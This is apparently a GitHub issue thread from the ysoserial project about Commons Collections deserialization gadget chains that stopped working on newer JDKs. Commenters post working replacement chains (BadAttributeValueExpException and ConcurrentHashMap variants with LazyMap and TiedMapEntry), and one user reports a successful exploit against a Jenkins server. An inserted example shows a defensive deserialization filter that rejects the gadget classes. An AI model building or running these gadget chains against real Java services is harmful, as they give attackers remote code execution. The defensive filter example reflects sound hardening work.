Comments (12)
Actually the same thing is happening with Oracle JDK 1.8.0_73.
Was AnnotationInvocationHandler changed in the JDK? If so, when?
It would be good to adjust AnnotationInvocationHandler used in the following payloads to work with the latest versions
- CommonsCollections1
- CommonsCollections3
- Spring1
from ysoserial.
I'll try to reproduce this when I have time. They may have done further gadget hardening that breaks these.
from ysoserial.
It does look like there were more significant changes made to AnnotationInvocationHandler as part of 8u72 in 12/2015.
There's a good chance this was hardening against these sorts of attacks and it will probably require a more significant time investment to fix.
from ysoserial.
For the Commons Collection this should work:
```java
Transformer transformerChain = new ChainedTransformer(transformers);
Map innerMap = new HashMap();
Map outerMap = LazyMap.decorate(innerMap, transformerChain);
TiedMapEntry entry = new TiedMapEntry(outerMap, "foo");
BadAttributeValueExpException val = new BadAttributeValueExpException(null);
Field valfield = val.getClass().getDeclaredField("val");
valfield.setAccessible(true);
valfield.set(val, entry);
String out = "/tmp/cc.ser";
ObjectOutputStream stream = new ObjectOutputStream(new FileOutputStream(out));
stream.writeObject(val);
stream.flush();
ObjectInputStream in = new ObjectInputStream(new FileInputStream(out));
in.readObject();
```
from ysoserial.
Seems to work for me. Although the Unit test doesn't pass for some reason. Submitted PR anyway:
#26
from ysoserial.
Looks like it does indeed work and it appears that the test failure is caused by a check for a null SecurityManager in BadAttributeValueExpException.readObject(ObjectInputStream) that fails due to the use of a SecurityManager to detect Runtime.exec() in the test scaffolding:
```java
private void readObject(ObjectInputStream ois) throws IOException, ClassNotFoundException {
    ObjectInputStream.GetField gf = ois.readFields();
    Object valObj = gf.get("val", null);
    if (valObj == null) {
        val = null;
    } else if (valObj instanceof String) {
        val = valObj;
    } else if (System.getSecurityManager() == null // <----------------------------- HERE
            || valObj instanceof Long
            || valObj instanceof Integer
            || valObj instanceof Float
            || valObj instanceof Double
            || valObj instanceof Byte
            || valObj instanceof Short
            || valObj instanceof Boolean) {
        val = valObj.toString();
    } else { // the serialized object is from a version without JDK-8019292 fix
        val = System.identityHashCode(valObj) + "@" + valObj.getClass().getName();
    }
}
```
The observer effect strikes again.
Looks like we'll need to figure out a more robust way of detecting successful execution while testing this stuff and I'm definitely open to ideas.
from ysoserial.
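The readObject() check above is the JDK's own hardening of one class; on the receiving side, the general control for the chain discussed in this thread is a deserialization filter that rejects the gadget classes by name before their readObject() ever runs. The following is an added example (not ysoserial code) that assumes Java 9+ for java.io.ObjectInputFilter; the class patterns and limits are a constructed policy, not a recommendation from the project:

```java
import java.io.*;
import java.util.HashMap;
import javax.management.BadAttributeValueExpException;

public class FilteredDeserialization {
    // Constructed deny-list: the Commons Collections packages and the trigger class from this
    // thread are rejected outright; depth/ref caps bound the graph size. "!" = reject, "**" = subpackages.
    static final ObjectInputFilter FILTER = ObjectInputFilter.Config.createFilter(
        "!org.apache.commons.collections.**;"
      + "!org.apache.commons.collections4.**;"
      + "!javax.management.BadAttributeValueExpException;"
      + "maxdepth=20;maxrefs=1000");

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    // Returns the object, or throws InvalidClassException when the filter rejects a class in the stream.
    static Object readFiltered(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            ois.setObjectInputFilter(FILTER);
            return ois.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        HashMap<String, String> benign = new HashMap<>();
        benign.put("k", "v");
        System.out.println("benign map: " + readFiltered(serialize(benign)));

        // A harmless instance (String val, no Transformer chain) of the class the gadget chain
        // rides on: the filter still rejects it by class name, before readObject() runs.
        byte[] blocked = serialize(new BadAttributeValueExpException("just a string"));
        try {
            readFiltered(blocked);
            System.out.println("unexpected: accepted");
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The same pattern string can be applied process-wide with the jdk.serialFilter system property instead of per-stream.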
I have changed the environment to openjdk 1.7.0, but the error also occurs.
java version "1.7.0_91"
OpenJDK Runtime Environment (IcedTea 2.6.3) (7u91-2.6.3-1)
OpenJDK 64-Bit Server VM (build 24.91-b01, mixed mode)
from ysoserial.
@jasinner, a stupid question: if you can't generate the jar package with mvn package (because the JUnit tests fail due to ExecCheckingSecurityManager$ExecException), how do you test your PR?
When I replay this experiment about jenkins, I get the same error in the server log.
How can I get this exploit to pass? Wait for the fix for that failure, or something else? Can you give me some tips?
My experiment environment is linux, openjdk1.8.0_72, jenkins 1.637.
Thanks very much.
from ysoserial.
add -DskipTests to your mvn clean package if you're trying to build the jar regardless of the unit test results.
master branch is not fully stable at the moment and we are working on getting things cleaned up.
from ysoserial.
👍 It works now! And I can see that /tmp/pwned exists. Great job!
from ysoserial.
Closing this for now since this is a limitation in the gadget chain(s) outside our control that should be helped by things like #10 and #30.
from ysoserial.
Using a ConcurrentHashMap might be the safer solution ...
```java
final Transformer transformerChain = new ChainedTransformer(transformers);
final Map innerMap = new HashMap();
final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");
ConcurrentHashMap map = new ConcurrentHashMap(1);
map.put("dummy1", "dummy1");
Field f = ConcurrentHashMap.class.getDeclaredField("table");
f.setAccessible(true);
Object[] array = (Object[]) f.get(map);
Object node = array[1];
Field keyField = node.getClass().getDeclaredField("key");
keyField.setAccessible(true);
keyField.set(node, entry);
String out = "/tmp/chm.ser";
ObjectOutputStream stream = new ObjectOutputStream(new FileOutputStream(out));
stream.writeObject(map);
stream.flush();
ObjectInputStream in = new ObjectInputStream(new FileInputStream(out));
in.readObject();
```
from ysoserial.